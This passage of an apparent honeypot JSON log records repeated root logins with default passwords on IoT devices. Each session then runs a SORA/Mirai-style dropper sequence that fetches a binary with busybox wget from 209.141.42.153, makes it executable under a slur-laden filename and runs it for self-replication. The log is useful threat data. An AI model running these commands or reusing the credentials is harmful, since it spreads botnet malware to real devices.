1708. "@timestamp": "2018-09-15T04:19:27.522Z",
1709. "eventid": "command.input",
1710. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
1711. },
1712. {
1713. "@timestamp": "2018-09-15T04:19:27.518Z",
1714. "eventid": "command.input",
1715. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
1716. },
1717. {
1718. "@timestamp": "2018-09-15T04:19:27.517Z",
1719. "eventid": "command.input",
1720. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
1721. },
1722. {
1723. "@timestamp": "2018-09-15T04:19:27.509Z",
1724. "eventid": "command.input",
1725. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
1726. },
1727. {
1728. "@timestamp": "2018-09-15T04:19:27.507Z",
1729. "eventid": "command.input",
1730. "input": "sh"
1731. },
1732. {
1733. "@timestamp": "2018-09-15T04:19:27.499Z",
1734. "eventid": "command.input",
1735. "input": "shell"
1736. },
1737. {
1738. "@timestamp": "2018-09-15T04:19:27.496Z",
1739. "eventid": "command.input",
1740. "input": "system"
1741. },
1742. {
1743. "@timestamp": "2018-09-15T04:19:27.405Z",
1744. "eventid": "command.input",
1745. "input": "enable"
1746. },
1747. {
1748. "@timestamp": "2018-09-15T04:19:27.305Z",
1749. "eventid": "command.input",
1750. "input": ""
1751. },
1752. {
1753. "@timestamp": "2018-09-15T04:19:25.746Z",
1754. "eventid": "login.success",
1755. "geoip": {
1756. "city_name": "Las Vegas",
1757. "country_name": "United States"
1758. },
1759. "password": "t0talc0ntr0l4!",
1760. "username": "root"
1761. }
1762. ],
1763. "bfa63a6b165d": [
1764. {
1765. "@timestamp": "2018-09-15T04:21:08.882Z",
1766. "eventid": "command.input",
1767. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
1768. },
1769. {
1770. "@timestamp": "2018-09-15T04:21:08.789Z",
1771. "eventid": "command.input",
1772. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
1773. },
1774. {
1775. "@timestamp": "2018-09-15T04:21:08.401Z",
1776. "eventid": "command.input",
1777. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1778. },
1779. {
1780. "@timestamp": "2018-09-15T04:21:08.300Z",
1781. "eventid": "command.input",
1782. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
1783. },
1784. {
1785. "@timestamp": "2018-09-15T04:21:08.205Z",
1786. "eventid": "command.input",
1787. "input": "/bin/busybox SORA"
1788. },
1789. {
1790. "@timestamp": "2018-09-15T04:21:08.104Z",
1791. "eventid": "command.input",
1792. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
1793. },
1794. {
1795. "@timestamp": "2018-09-15T04:21:07.997Z",
1796. "eventid": "command.input",
1797. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1798. },
1799. {
1800. "@timestamp": "2018-09-15T04:21:07.987Z",
1801. "eventid": "command.input",
1802. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
1803. },
1804. {
1805. "@timestamp": "2018-09-15T04:21:07.978Z",
1806. "eventid": "command.input",
1807. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
1808. },
1809. {
1810. "@timestamp": "2018-09-15T04:21:07.976Z",
1811. "eventid": "command.input",
1812. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
1813. },
1814. {
1815. "@timestamp": "2018-09-15T04:21:07.969Z",
1816. "eventid": "command.input",
1817. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
1818. },
1819. {
1820. "@timestamp": "2018-09-15T04:21:07.959Z",
1821. "eventid": "command.input",
1822. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
1823. },
1824. {
1825. "@timestamp": "2018-09-15T04:21:07.957Z",
1826. "eventid": "command.input",
1827. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
1828. },
1829. {
1830. "@timestamp": "2018-09-15T04:21:07.949Z",
1831. "eventid": "command.input",
1832. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
1833. },
1834. {
1835. "@timestamp": "2018-09-15T04:21:07.948Z",
1836. "eventid": "command.input",
1837. "input": "\u003e/.ptmx \u0026\u0026 cd /"
1838. },
1839. {
1840. "@timestamp": "2018-09-15T04:21:07.940Z",
1841. "eventid": "command.input",
1842. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
1843. },
1844. {
1845. "@timestamp": "2018-09-15T04:21:07.929Z",
1846. "eventid": "command.input",
1847. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
1848. },
1849. {
1850. "@timestamp": "2018-09-15T04:21:07.927Z",
1851. "eventid": "command.input",
1852. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
1853. },
1854. {
1855. "@timestamp": "2018-09-15T04:21:07.919Z",
1856. "eventid": "command.input",
1857. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
1858. },
1859. {
1860. "@timestamp": "2018-09-15T04:21:07.917Z",
1861. "eventid": "command.input",
1862. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
1863. },
1864. {
1865. "@timestamp": "2018-09-15T04:21:07.910Z",
1866. "eventid": "command.input",
1867. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
1868. },
1869. {
1870. "@timestamp": "2018-09-15T04:21:07.907Z",
1871. "eventid": "command.input",
1872. "input": "sh"
1873. },
1874. {
1875. "@timestamp": "2018-09-15T04:21:07.900Z",
1876. "eventid": "command.input",
1877. "input": "shell"
1878. },
1879. {
1880. "@timestamp": "2018-09-15T04:21:07.897Z",
1881. "eventid": "command.input",
1882. "input": "system"
1883. },
1884. {
1885. "@timestamp": "2018-09-15T04:21:07.809Z",
1886. "eventid": "command.input",
1887. "input": "enable"
1888. },
1889. {
1890. "@timestamp": "2018-09-15T04:21:07.715Z",
1891. "eventid": "command.input",
1892. "input": ""
1893. },
1894. {
1895. "@timestamp": "2018-09-15T04:21:06.830Z",
1896. "eventid": "login.success",
1897. "geoip": {
1898. "city_name": "Las Vegas",
1899. "country_name": "United States"
1900. },
1901. "password": "default",
1902. "username": "root"
1903. }
1904. ],
1905. "c6a1f7b085e2": [
1906. {
1907. "@timestamp": "2018-09-15T04:12:47.091Z",
1908. "eventid": "command.input",
1909. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
1910. },
1911. {
1912. "@timestamp": "2018-09-15T04:12:47.000Z",
1913. "eventid": "command.input",
1914. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
1915. },
1916. {
1917. "@timestamp": "2018-09-15T04:12:46.640Z",
1918. "eventid": "command.input",
1919. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1920. },
1921. {
1922. "@timestamp": "2018-09-15T04:12:46.540Z",
1923. "eventid": "command.input",
1924. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
1925. },
1926. {
1927. "@timestamp": "2018-09-15T04:12:46.449Z",
1928. "eventid": "command.input",
1929. "input": "/bin/busybox SORA"
1930. },
1931. {
1932. "@timestamp": "2018-09-15T04:12:46.346Z",
1933. "eventid": "command.input",
1934. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
1935. },
1936. {
1937. "@timestamp": "2018-09-15T04:12:46.246Z",
1938. "eventid": "command.input",
1939. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1940. },
1941. {
1942. "@timestamp": "2018-09-15T04:12:46.237Z",
1943. "eventid": "command.input",
1944. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
1945. },
1946. {
1947. "@timestamp": "2018-09-15T04:12:46.235Z",
1948. "eventid": "command.input",
1949. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
1950. },
1951. {
1952. "@timestamp": "2018-09-15T04:12:46.228Z",
1953. "eventid": "command.input",
1954. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
1955. },
1956. {
1957. "@timestamp": "2018-09-15T04:12:46.226Z",
1958. "eventid": "command.input",
1959. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
1960. },
1961. {
1962. "@timestamp": "2018-09-15T04:12:46.218Z",
1963. "eventid": "command.input",
1964. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
1965. },
1966. {
1967. "@timestamp": "2018-09-15T04:12:46.216Z",
1968. "eventid": "command.input",
1969. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
1970. },
1971. {
1972. "@timestamp": "2018-09-15T04:12:46.208Z",
1973. "eventid": "command.input",
1974. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
1975. },
1976. {
1977. "@timestamp": "2018-09-15T04:12:46.207Z",
1978. "eventid": "command.input",
1979. "input": "\u003e/.ptmx \u0026\u0026 cd /"
1980. },
1981. {
1982. "@timestamp": "2018-09-15T04:12:46.205Z",
1983. "eventid": "command.input",
1984. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
1985. },
1986. {
1987. "@timestamp": "2018-09-15T04:12:46.198Z",
1988. "eventid": "command.input",
1989. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
1990. },
1991. {
1992. "@timestamp": "2018-09-15T04:12:46.197Z",
1993. "eventid": "command.input",
1994. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
1995. },
1996. {
1997. "@timestamp": "2018-09-15T04:12:46.189Z",
1998. "eventid": "command.input",
1999. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
2000. },
2001. {
2002. "@timestamp": "2018-09-15T04:12:46.188Z",
2003. "eventid": "command.input",
2004. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
2005. },
2006. {
2007. "@timestamp": "2018-09-15T04:12:46.186Z",
2008. "eventid": "command.input",
2009. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
2010. },
2011. {
2012. "@timestamp": "2018-09-15T04:12:46.179Z",
2013. "eventid": "command.input",
2014. "input": "sh"
2015. },
2016. {
2017. "@timestamp": "2018-09-15T04:12:46.177Z",
2018. "eventid": "command.input",
2019. "input": "shell"
2020. },
2021. {
2022. "@timestamp": "2018-09-15T04:12:46.175Z",
2023. "eventid": "command.input",
2024. "input": "system"
2025. },
2026. {
2027. "@timestamp": "2018-09-15T04:12:46.085Z",
2028. "eventid": "command.input",
2029. "input": "enable"
2030. },
2031. {
2032. "@timestamp": "2018-09-15T04:12:45.897Z",
2033. "eventid": "command.input",
2034. "input": ""
2035. },
2036. {
2037. "@timestamp": "2018-09-15T04:12:45.072Z",
2038. "eventid": "login.success",
2039. "geoip": {
2040. "city_name": "Las Vegas",
2041. "country_name": "United States"
2042. },
2043. "password": "root",
2044. "username": "root"
2045. }
2046. ],
2047. "cfdeac26605e": [
2048. {
2049. "@timestamp": "2018-09-15T04:12:40.806Z",
2050. "eventid": "command.input",
2051. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
2052. },
2053. {
2054. "@timestamp": "2018-09-15T04:12:40.760Z",
2055. "eventid": "command.input",
2056. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
2057. },
2058. {
2059. "@timestamp": "2018-09-15T04:12:40.581Z",
2060. "eventid": "command.input",
2061. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2062. },
2063. {
2064. "@timestamp": "2018-09-15T04:12:40.531Z",
2065. "eventid": "command.input",
2066. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
2067. },
2068. {
2069. "@timestamp": "2018-09-15T04:12:40.445Z",
2070. "eventid": "command.input",
2071. "input": "/bin/busybox SORA"
2072. },
2073. {
2074. "@timestamp": "2018-09-15T04:12:40.398Z",
2075. "eventid": "command.input",
2076. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
2077. },
2078. {
2079. "@timestamp": "2018-09-15T04:12:40.346Z",
2080. "eventid": "command.input",
2081. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2082. },
2083. {
2084. "@timestamp": "2018-09-15T04:12:40.342Z",
2085. "eventid": "command.input",
2086. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
2087. },
2088. {
2089. "@timestamp": "2018-09-15T04:12:40.339Z",
2090. "eventid": "command.input",
2091. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
2092. },
2093. {
2094. "@timestamp": "2018-09-15T04:12:40.337Z",
2095. "eventid": "command.input",
2096. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
2097. },
2098. {
2099. "@timestamp": "2018-09-15T04:12:40.335Z",
2100. "eventid": "command.input",
2101. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
2102. },
2103. {
2104. "@timestamp": "2018-09-15T04:12:40.332Z",
2105. "eventid": "command.input",
2106. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
2107. },
2108. {
2109. "@timestamp": "2018-09-15T04:12:40.329Z",
2110. "eventid": "command.input",
2111. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
2112. },
2113. {
2114. "@timestamp": "2018-09-15T04:12:40.326Z",
2115. "eventid": "command.input",
2116. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
2117. },
2118. {
2119. "@timestamp": "2018-09-15T04:12:40.324Z",
2120. "eventid": "command.input",
2121. "input": "\u003e/.ptmx \u0026\u0026 cd /"
2122. },
2123. {
2124. "@timestamp": "2018-09-15T04:12:40.322Z",
2125. "eventid": "command.input",
2126. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
2127. },
2128. {
2129. "@timestamp": "2018-09-15T04:12:40.319Z",
2130. "eventid": "command.input",
2131. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
2132. },
2133. {
2134. "@timestamp": "2018-09-15T04:12:40.317Z",
2135. "eventid": "command.input",
2136. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
2137. },
2138. {
2139. "@timestamp": "2018-09-15T04:12:40.314Z",
2140. "eventid": "command.input",
2141. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
2142. },
2143. {
2144. "@timestamp": "2018-09-15T04:12:40.312Z",
2145. "eventid": "command.input",
2146. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
2147. },
2148. {
2149. "@timestamp": "2018-09-15T04:12:40.310Z",
2150. "eventid": "command.input",
2151. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
2152. },
2153. {
2154. "@timestamp": "2018-09-15T04:12:40.308Z",
2155. "eventid": "command.input",
2156. "input": "sh"
2157. },
2158. {
2159. "@timestamp": "2018-09-15T04:12:40.305Z",
2160. "eventid": "command.input",
2161. "input": "shell"
2162. },
2163. {
2164. "@timestamp": "2018-09-15T04:12:40.302Z",
2165. "eventid": "command.input",
2166. "input": "system"
2167. },
2168. {
2169. "@timestamp": "2018-09-15T04:12:40.261Z",
2170. "eventid": "command.input",
2171. "input": "enable"
2172. },
2173. {
2174. "@timestamp": "2018-09-15T04:12:40.156Z",
2175. "eventid": "command.input",
2176. "input": ""
2177. },
2178. {
2179. "@timestamp": "2018-09-15T04:12:39.646Z",
2180. "eventid": "login.success",
2181. "geoip": {
2182. "city_name": "Las Vegas",
2183. "country_name": "United States"
2184. },
2185. "password": "admin",
2186. "username": "root"
2187. }
2188. ],
2189. "e193b44265c4": [
2190. {
2191. "@timestamp": "2018-09-15T04:13:59.405Z",
2192. "eventid": "command.input",
2193. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
2194. },
2195. {
2196. "@timestamp": "2018-09-15T04:13:59.325Z",
2197. "eventid": "command.input",
2198. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
2199. },
2200. {
2201. "@timestamp": "2018-09-15T04:13:59.008Z",
2202. "eventid": "command.input",
2203. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2204. },
2205. {
2206. "@timestamp": "2018-09-15T04:13:58.926Z",
2207. "eventid": "command.input",
2208. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
2209. },
2210. {
2211. "@timestamp": "2018-09-15T04:13:58.848Z",
2212. "eventid": "command.input",
2213. "input": "/bin/busybox SORA"
2214. },
2215. {
2216. "@timestamp": "2018-09-15T04:13:58.762Z",
2217. "eventid": "command.input",
2218. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
2219. },
2220. {
2221. "@timestamp": "2018-09-15T04:13:58.679Z",
2222. "eventid": "command.input",
2223. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2224. },
2225. {
2226. "@timestamp": "2018-09-15T04:13:58.675Z",
2227. "eventid": "command.input",
2228. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
2229. },
2230. {
2231. "@timestamp": "2018-09-15T04:13:58.673Z",
2232. "eventid": "command.input",
2233. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
2234. },
2235. {
2236. "@timestamp": "2018-09-15T04:13:58.671Z",
2237. "eventid": "command.input",
2238. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
2239. },
2240. {
2241. "@timestamp": "2018-09-15T04:13:58.669Z",
2242. "eventid": "command.input",
2243. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
2244. },
2245. {
2246. "@timestamp": "2018-09-15T04:13:58.667Z",
2247. "eventid": "command.input",
2248. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
2249. },
2250. {
2251. "@timestamp": "2018-09-15T04:13:58.665Z",
2252. "eventid": "command.input",
2253. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
2254. },
2255. {
2256. "@timestamp": "2018-09-15T04:13:58.663Z",
2257. "eventid": "command.input",
2258. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
2259. },
2260. {
2261. "@timestamp": "2018-09-15T04:13:58.661Z",
2262. "eventid": "command.input",
2263. "input": "\u003e/.ptmx \u0026\u0026 cd /"
2264. },
2265. {
2266. "@timestamp": "2018-09-15T04:13:58.659Z",
2267. "eventid": "command.input",
2268. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
2269. },
2270. {
2271. "@timestamp": "2018-09-15T04:13:58.657Z",
2272. "eventid": "command.input",
2273. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
2274. },
2275. {
2276. "@timestamp": "2018-09-15T04:13:58.655Z",
2277. "eventid": "command.input",
2278. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
2279. },
2280. {
2281. "@timestamp": "2018-09-15T04:13:58.653Z",
2282. "eventid": "command.input",
2283. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
2284. },
2285. {
2286. "@timestamp": "2018-09-15T04:13:58.651Z",
2287. "eventid": "command.input",
2288. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
2289. },
2290. {
2291. "@timestamp": "2018-09-15T04:13:58.649Z",
2292. "eventid": "command.input",
2293. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
2294. },
2295. {
2296. "@timestamp": "2018-09-15T04:13:58.646Z",
2297. "eventid": "command.input",
2298. "input": "sh"
2299. },
2300. {
2301. "@timestamp": "2018-09-15T04:13:58.643Z",
2302. "eventid": "command.input",
2303. "input": "shell"
2304. },
2305. {
2306. "@timestamp": "2018-09-15T04:13:58.640Z",
2307. "eventid": "command.input",
2308. "input": "system"
2309. },
2310. {
2311. "@timestamp": "2018-09-15T04:13:58.562Z",
2312. "eventid": "command.input",
2313. "input": "enable"
2314. },
2315. {
2316. "@timestamp": "2018-09-15T04:13:58.484Z",
2317. "eventid": "command.input",
2318. "input": ""
2319. },
2320. {
2321. "@timestamp": "2018-09-15T04:13:57.990Z",
2322. "eventid": "login.success",
2323. "geoip": {
2324. "city_name": "Las Vegas",
2325. "country_name": "United States"
2326. },
2327. "password": "root",
2328. "username": "root"
2329. }
2330. ],
2331. "e72a54537f35": [
2332. {
2333. "@timestamp": "2018-09-15T04:15:34.664Z",
2334. "eventid": "command.input",
2335. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
2336. },
2337. {
2338. "@timestamp": "2018-09-15T04:15:34.573Z",
2339. "eventid": "command.input",
2340. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
2341. },
2342. {
2343. "@timestamp": "2018-09-15T04:15:34.208Z",
2344. "eventid": "command.input",
2345. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2346. },
2347. {
2348. "@timestamp": "2018-09-15T04:15:34.108Z",
2349. "eventid": "command.input",
2350. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
2351. },
2352. {
2353. "@timestamp": "2018-09-15T04:15:34.004Z",
2354. "eventid": "command.input",
2355. "input": "/bin/busybox SORA"
2356. },
2357. {
2358. "@timestamp": "2018-09-15T04:15:33.829Z",
2359. "eventid": "command.input",
2360. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
2361. },
2362. {
2363. "@timestamp": "2018-09-15T04:15:33.725Z",
2364. "eventid": "command.input",
2365. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2366. },
2367. {
2368. "@timestamp": "2018-09-15T04:15:33.722Z",
2369. "eventid": "command.input",
2370. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
2371. },
2372. {
2373. "@timestamp": "2018-09-15T04:15:33.715Z",
2374. "eventid": "command.input",
2375. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
2376. },
2377. {
2378. "@timestamp": "2018-09-15T04:15:33.713Z",
2379. "eventid": "command.input",
2380. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
2381. },
2382. {
2383. "@timestamp": "2018-09-15T04:15:33.706Z",
2384. "eventid": "command.input",
2385. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
2386. },
2387. {
2388. "@timestamp": "2018-09-15T04:15:33.704Z",
2389. "eventid": "command.input",
2390. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
2391. },
2392. {
2393. "@timestamp": "2018-09-15T04:15:33.696Z",
2394. "eventid": "command.input",
2395. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
2396. },
2397. {
2398. "@timestamp": "2018-09-15T04:15:33.694Z",
2399. "eventid": "command.input",
2400. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
2401. },
2402. {
2403. "@timestamp": "2018-09-15T04:15:33.693Z",
2404. "eventid": "command.input",
2405. "input": "\u003e/.ptmx \u0026\u0026 cd /"
2406. },
2407. {
2408. "@timestamp": "2018-09-15T04:15:33.686Z",
2409. "eventid": "command.input",
2410. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
2411. },
2412. {
2413. "@timestamp": "2018-09-15T04:15:33.684Z",
2414. "eventid": "command.input",
2415. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
2416. },
2417. {
2418. "@timestamp": "2018-09-15T04:15:33.683Z",
2419. "eventid": "command.input",
2420. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
2421. },
2422. {
2423. "@timestamp": "2018-09-15T04:15:33.675Z",
2424. "eventid": "command.input",
2425. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
2426. },
2427. {
2428. "@timestamp": "2018-09-15T04:15:33.674Z",
2429. "eventid": "command.input",
2430. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
2431. },
2432. {
2433. "@timestamp": "2018-09-15T04:15:33.667Z",
2434. "eventid": "command.input",
2435. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
2436. },
2437. {
2438. "@timestamp": "2018-09-15T04:15:33.666Z",
2439. "eventid": "command.input",
2440. "input": "sh"
2441. },
2442. {
2443. "@timestamp": "2018-09-15T04:15:33.658Z",
2444. "eventid": "command.input",
2445. "input": "shell"
2446. },
2447. {
2448. "@timestamp": "2018-09-15T04:15:33.655Z",
2449. "eventid": "command.input",
2450. "input": "system"
2451. },
2452. {
2453. "@timestamp": "2018-09-15T04:15:33.648Z",
2454. "eventid": "command.input",
2455. "input": "enable"
2456. },
2457. {
2458. "@timestamp": "2018-09-15T04:15:32.853Z",
2459. "eventid": "command.input",
2460. "input": ""
2461. },
2462. {
2463. "@timestamp": "2018-09-15T04:15:31.998Z",
2464. "eventid": "login.success",
2465. "geoip": {
2466. "city_name": "Las Vegas",
2467. "country_name": "United States"
2468. },
2469. "password": "t0talc0ntr0l4!",
2470. "username": "root"
2471. }
2472. ],
2473. "e986826fc214": [
2474. {
2475. "@timestamp": "2018-09-15T04:15:34.877Z",
2476. "eventid": "command.input",
2477. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
2478. },
2479. {
2480. "@timestamp": "2018-09-15T04:15:34.786Z",
2481. "eventid": "command.input",
2482. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
2483. },
2484. {
2485. "@timestamp": "2018-09-15T04:15:34.418Z",
2486. "eventid": "command.input",
2487. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2488. },
2489. {
2490. "@timestamp": "2018-09-15T04:15:34.324Z",
2491. "eventid": "command.input",
2492. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
2493. },
2494. {
2495. "@timestamp": "2018-09-15T04:15:34.182Z",
2496. "eventid": "command.input",
2497. "input": "/bin/busybox SORA"
2498. },
2499. {
2500. "@timestamp": "2018-09-15T04:15:34.094Z",
2501. "eventid": "command.input",
2502. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
2503. },
2504. {
2505. "@timestamp": "2018-09-15T04:15:33.993Z",
2506. "eventid": "command.input",
2507. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2508. },
2509. {
2510. "@timestamp": "2018-09-15T04:15:33.984Z",
2511. "eventid": "command.input",
2512. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
2513. },
2514. {
2515. "@timestamp": "2018-09-15T04:15:33.982Z",
2516. "eventid": "command.input",
2517. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
2518. },
2519. {
2520. "@timestamp": "2018-09-15T04:15:33.974Z",
2521. "eventid": "command.input",
2522. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
2523. },
2524. {
2525. "@timestamp": "2018-09-15T04:15:33.972Z",
2526. "eventid": "command.input",
2527. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
2528. },
2529. {
2530. "@timestamp": "2018-09-15T04:15:33.965Z",
2531. "eventid": "command.input",
2532. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
2533. },
2534. {
2535. "@timestamp": "2018-09-15T04:15:33.963Z",
2536. "eventid": "command.input",
2537. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
2538. },
2539. {
2540. "@timestamp": "2018-09-15T04:15:33.955Z",
2541. "eventid": "command.input",
2542. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
2543. },
2544. {
2545. "@timestamp": "2018-09-15T04:15:33.953Z",
2546. "eventid": "command.input",
2547. "input": "\u003e/.ptmx \u0026\u0026 cd /"
2548. },
2549. {
2550. "@timestamp": "2018-09-15T04:15:33.945Z",
2551. "eventid": "command.input",
2552. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
2553. },
2554. {
2555. "@timestamp": "2018-09-15T04:15:33.942Z",
2556. "eventid": "command.input",
2557. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
2558. },
2559. {
2560. "@timestamp": "2018-09-15T04:15:33.934Z",
2561. "eventid": "command.input",
2562. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
2563. },
2564. {
2565. "@timestamp": "2018-09-15T04:15:33.933Z",
2566. "eventid": "command.input",
2567. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
